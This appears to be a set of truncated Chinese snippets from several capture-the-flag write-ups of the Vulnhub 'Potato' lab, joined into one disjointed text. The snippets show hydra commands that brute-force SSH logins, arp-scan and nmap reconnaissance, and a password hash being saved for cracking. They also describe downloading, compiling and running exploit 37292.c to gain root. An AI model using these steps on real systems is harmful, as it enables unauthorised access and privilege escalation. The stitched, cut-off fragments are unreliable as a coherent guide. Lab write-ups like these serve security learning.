得到了系统版本号 回想起还有个ssh服务开着 使用hydra爆破下 hydra -l potato -P rockyou.txt -V ssh://192.168.2.115:7120 //这边之前看了眼别人的所以知道用户名是potato,建议还是把用户名也爆破下,当然这取决于你的字典是否强大 hydra -L user.txt -P top1000.txt -vV ssh://192.168.11.131:7120 -f ...
参数: 靶机执行 使用wget命令下载上传的37292.c文件 编译 赋予脚本可执行权限 执行 进入超级管理员家目录发现一个文件并打开 总结: 列出局域网内的主机 arp-scan -l 根据靶机的mac地址可以看到靶机的ip地址 端口扫描 sudo nmap -T4 -A 10.9.28.160 -p 1-65535 -T【0-6】:设置定时模板(越高越快) -A :i...
web admin加密后的密码是$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/ ┌──(kali㉿kali)-[~/Vulnhub/Potato] └─$ echo '$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/' > webadmin_hash ┌──(kali㉿kali)-[~/Vulnhub/Potato] └─$ cat webadmin_hash$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/┌──(kali...